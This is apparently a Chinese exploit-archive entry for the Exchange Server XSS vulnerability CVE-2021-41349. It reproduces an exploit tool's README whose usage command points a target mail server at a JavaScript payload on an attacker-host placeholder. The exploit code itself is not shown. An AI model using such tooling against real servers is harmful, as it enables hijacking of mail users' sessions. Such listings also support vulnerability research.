关联漏洞
标题:Microsoft Exchange Server 安全漏洞 (CVE-2021-41349)Description:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server存在安全漏洞。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange Server 2016 Cumulative Update 21,Microsoft Exchange Ser
Description
Exploiting: CVE-2021-41349
介绍
# Microsoft Exchange Exploit CVE-2021-41349
Exploiting: CVE-2021-41349
This exploiting tool creates a Form for posting XSS Payload to the target Exchange server.
You need to create a `js` containing your desire to do.
# Usage
1. Create Your `js` Payload and upload it somewhare.
2. run the `CVE-2021-41349.py` same as following steps.
```shell
python3 CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
```
or:
```shell
./CVE-2021-41349.py "https://mail.target.com" "https://hacker.server/payload.js" out.html
```
3. Upload The `html` file into server.
4. Done! Test it!
# Credits
* [@exploitio](https://twitter.com/exploitio)
文件快照
[4.0K] /data/pocs/4422545cfb04edd6037de3aba0495478ccc936e8
├── [2.3K] CVE-2021-41349.py
└── [ 665] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。